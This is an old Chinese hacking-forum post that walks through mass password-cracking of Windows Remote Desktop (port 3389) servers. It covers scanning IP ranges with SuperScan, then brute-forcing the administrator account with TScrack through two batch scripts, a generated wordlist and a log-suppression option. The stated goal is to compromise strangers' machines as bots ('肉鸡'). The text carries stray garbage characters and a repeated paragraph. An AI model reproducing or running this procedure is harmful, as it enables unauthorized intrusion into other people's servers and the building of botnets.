|
作者:霜风 QQ:14226581 1 V3 u( a, x# g7 F3 s
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
! G: M" |# C6 s2 T8 A) C3 ?7 d这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
, {/ R: j- `8 o* F0 }) r首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:8 J2 P; H3 K" T
先打开superscan3如图1
* z/ c! V8 w; ~
1 [" \/ G. e# j' H此主题相关图片如下:. g/ j4 Y$ H1 s0 N
5 u& z) u. c5 T+ h9 h
1 @ z9 \8 R: A2 Q) A
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2/ W" e& N/ O5 J6 Q+ W8 u. d
+ `- N3 K/ x, i/ e) z% ~
此主题相关图片如下:4 u8 A: P8 ?7 M
# ?* W2 g9 l. O5 T' K
: a% o, W5 [5 K. c+ T- X" K7 e然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.0 Z& G0 N. ?4 @8 ?8 H& w1 B
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
8 T7 X" |) _) @
7 t. R5 M2 T3 \5 d, J0 x5 A/ M此主题相关图片如下:4 r9 I0 N \+ M5 V( \- h
3 i) Y" _# M, t- `2 A- Q; [; O. e: D* |
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。+ U0 L! P4 T2 ^. r I0 X
l5 ~2 ~( _) u6 P$ _+ l2 Z此主题相关图片如下:" `1 c" `8 [$ X7 T4 ~: K
0 A7 p3 L! W& [* N0 L
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
/ p2 s c6 U$ D! ?9 Y* r% _, ?4 x+ x1 b& z* a! p1 c+ _, ?+ C* ]3 g- i
此主题相关图片如下:7 e! W( h' `* O: U) T! [1 Z
; [. k8 ^5 \4 D9 i- Y3 \
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
- I7 ~8 f, x7 |# f+ G所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
) g! ^/ N: _0 J+ q8 aTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
" j& S3 @: f" w0 d4 R此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 T, t; U3 Y4 @7 \3 ~
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:: S0 k5 [& a5 A8 f' w# p) f4 @
-h : Print usage help and exit; l' ~& X W! [4 T c! y# A" s
-V : Print version info and exit
& d( y+ s3 b! S% S-s : Print chipher strenght info and exit* w, F; r3 a7 g
-b : Enable failed password beep
2 T& m& Z# @5 F5 }, ]-t : Use two simultaneous connections [EXPERIMENTAL]6 G- P# f$ o" Y+ ^ {
-N : Prevent System Log entries on targeted server
: I9 i) _& E1 \6 B Y-U : Uninstall tscrack and remove components* J6 P( v' y# q* p
-f <number> : Wordlist entry to start cracking with
K, E* a* V$ w6 r/ t& y' K-F <delay> : Sampling Frequency (Delay between samples in ms)
4 M0 l, W& |/ A-l <user> : Account name to use, defaults to Administrator
6 `; r- M$ n. ]& u. R-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
1 }2 J8 W7 _7 T3 N7 K: c, j1 T-p <password> : Use <password> to logon instead of wordlist/blank pass, J0 L# C1 B9 y0 M( m% ^& n6 I2 }
-D <domain> : Specify domain to attempt logon to
! e6 b! W: a: x* ~3 q% A
' r) Z. z' T0 f: M0 w8 a
' ~0 w* u7 w2 T& S! v9 {我就帮忙翻译一下吧,翻译得不好可不要怪我啊:5 _1 [; r- U3 V* L' W, s
-h : 显示使用帮助然后退出( h' Y. l2 K7 ?( j2 n+ I: ^
-V : 显示版本信息然后退出
: e, }) }* q5 \- Z3 @9 j+ M1 H-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)
4 F# T7 M" ?9 [' t-b : 密码错误时发出声音
8 [& Q" G) N G5 E; q-t : 同时发出多个连接,就是多线程。
, Z7 B8 h* s% C-N : Prevent System Log entries on targeted server
+ \5 t6 E9 G8 w5 M7 V) p6 Y-U : 卸载移除tscrack组件。- }+ J6 M8 V6 c9 i4 T0 T
-f <number> : 使用-F后面的密码。! V4 O* H9 E& G5 h4 @# S
-F <delay> : 间隔时间(频率)
3 R1 t' V$ C& z `& t& D-l <user> : 使用-L后面的用户名
# p; e3 R7 z' n/ L-w <wordlist> : 使用-W后面的字典
. a2 A3 a; i7 c6 I-p <password> : 使用-W后的密码
: e* h$ @# N. {: k! Y-D <domain> : 登陆主页面?) Z7 D( ]: ~. y" f. [ k7 p. d
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
0 Y( H) C4 z7 `# u3 z8 g, m2 C@if not exist IpcScan.txt goto noscan4 \$ n! D8 l n* I8 E0 u- s# ~; m
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i& g/ q1 O W2 K$ q. e" Q/ F- p
:noscan
% ^9 s3 [5 D+ T' Z2 J@echo 3389.txt no find or scan faild  * h/ T2 n" V1 ?; J. r
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)! n& l$ W3 `* I/ I
保存后把后错名改为BAT就可以了。
3 g2 S' F9 f' K# I K还写一个BAT,名字为HACK.BAT,代码如下:; H: C, y0 O8 S
@if not exist tscrack.exe goto noscan- Y" N( o: `6 t7 _4 e f
@tscrack %1 -l administartor -w pass.dic >>rouji.txt
+ `8 w9 S/ z9 X4 T! d) }! ] D- d:noscan
( u9 y6 g+ H0 J* j& F* [@echo tscrack.exe no find or scan faild
) D4 t; j* \4 z6 B" I" s6 f0 }& N这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
7 M, m9 [. ?* z制作方法如上。
, v) J0 q- i4 \然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6* ~) ]( I; q* d$ l8 ~8 D
! T! |' @; N( h/ W( C1 f此主题相关图片如下:
8 C/ ]: e) Q6 E2 K2 Y$ k怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
1 [+ l4 t/ ?4 U$ ], h7 ]最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
1 ?' g* Q. ]- j/ F% {
' e! c6 ^8 l. F ^$ O2 ?此主题相关图片如下:
1 }- Y. x3 ^, b) r: h
- [! \+ ?" P3 E5 p怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
/ w. P$ w, E# o4 ]0 G最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
